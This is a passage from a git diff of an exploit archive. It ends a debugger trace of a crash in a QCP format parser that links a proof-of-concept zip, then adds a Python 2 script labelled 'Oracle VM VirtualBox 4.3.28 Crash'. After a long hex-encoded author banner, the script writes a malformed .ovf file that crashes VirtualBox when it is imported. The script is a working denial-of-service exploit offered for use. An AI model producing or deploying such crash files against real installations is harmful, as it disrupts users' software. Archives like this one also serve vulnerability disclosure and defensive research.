+54cd13d3 83794000        cmp     dword ptr [ecx+40h],0 ds:002b:1c5342b0=00000001
+0:000> t
+eax=00000002 ebx=00000000 ecx=1c534270 edx=54cd5394 esi=00000000 edi=04905784
+eip=54cd13d7 esp=00bce4cc ebp=00bce4cc iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
+qcpfformat+0x13d7:
+54cd13d7 8b5508          mov     edx,dword ptr [ebp+8] ss:002b:00bce4d4=00000000
+0:000> t
+eax=00000002 ebx=00000000 ecx=1c534270 edx=00000000 esi=00000000 edi=04905784
+eip=54cd13da esp=00bce4cc ebp=00bce4cc iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
+qcpfformat+0x13da:
+54cd13da 7422            je      qcpfformat+0x13fe (54cd13fe)            [br=0]
+0:000> t
+eax=00000002 ebx=00000000 ecx=1c534270 edx=00000000 esi=00000000 edi=04905784
+eip=54cd13dc esp=00bce4cc ebp=00bce4cc iopl=0         nv up ei pl nz na po nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
+qcpfformat+0x13dc:
+54cd13dc 0fb64203        movzx   eax,byte ptr [edx+3]       ds:002b:00000003=??
+
+POC:
+
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40617.zip
\ No newline at end of file
diff --git a/platforms/windows/dos/40618.py b/platforms/windows/dos/40618.py
new file mode 100755
index 000000000..6e6af3675
--- /dev/null
+++ b/platforms/windows/dos/40618.py
@@ -0,0 +1,91 @@
+#Exploit Title: Oracle VM VirtualBox 4.3.28 Crash
+#Author: sultan albalawi
+#Tested on:win7
+#open viryualbox -->ctrl+i-->choose file -->double+double+double next
+ban= '\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x5c\x20\x20\x20\x2d\x20\x20'
+ban+='\x2d\x20\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e\x20\x20\x2d'
+ban+='\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d\x20\x2d\x20\x20\x2d\x20\x2d\x20'
+ban+='\x20\x2d\x20\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x0d\x0a\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74'
+ban+='\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a'
+ban+='\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20\x60\x2e'
+ban+='\x20\x20\x20\x20\x2c\x3b\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70\x50'
+ban+='\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d'
+ban+='\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x60\x2e\x20\x58\x20\x2f\x2e\x27\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20\x2a\x2a\x2a'
+ban+='\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f\x60\x20'
+ban+='\x60\x20\x28\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x0d'
+ban+='\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x2f\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x7c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20'
+ban+='\x20\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74\x79\x60\x20\x20'
+ban+='\x27\x20\x30\x20\x20\x30\x20\x27\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x2a\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x7c\x0d\x0a\x20\x20\x20\x20\x2c\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x2c\x20\x20\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x60\x2e\x5f\x2e\x27'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
+ban+='\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d\x5e\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60'
+ban+='\x20\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d\x2d\x2c\x2e\x2e'
+ban+='\x5f\x3b\x2d\x2d\x2d\x3e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f\x5f\x5f\x5f'
+ban+='\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a\x20\x20\x27\x20\x60\x20\x20\x20'
+ban+='\x20\x2c\x20\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65\x77'
+ban+='\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20\x20\x20\x60\x2e\x5f\x20'
+ban+='\x2c\x20\x20\x27\x20\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20'
+ban+='\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3b\x20\x2c\x27'
+ban+='\x27\x2d\x2c\x3b\x27\x20\x60\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f'
+ban+='\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x60\x60\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d'
+ban+='\x2d\x60\x20\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x27'
+ban+='\x2e\x20\x5f\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20'
+ban+='\x7c\x5f\x20\x20\x49\x50\x53\x20\x20\x20\x20\x20\x29\x0d\x0a\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
+ban+='\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x20\x7c\x7c\x0d\x0a\x20'
+ban+='\n'
+ban+='\x53\x75\x6c\x74\x61\x6e\x5f\x41\x6c\x62\x61\x6c\x61\x77\x69\n'
+ban+='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65\x6e\x74\x65\x73\x74\x33\n'
+print ban
+pof1 = "<"
+pof2 = "http://"
+Crash = "\x41"*19
+pof3=">"
+vm = pof1+pof2+Crash+pof3+pof1+pof2+Crash+pof3
+Crash_file=("Crach.ovf")
+file = open(Crash_file, "w")
+file.write(vm)
+file.close()
+print 'file done'.format(Crash_file)
\ No newline at end of file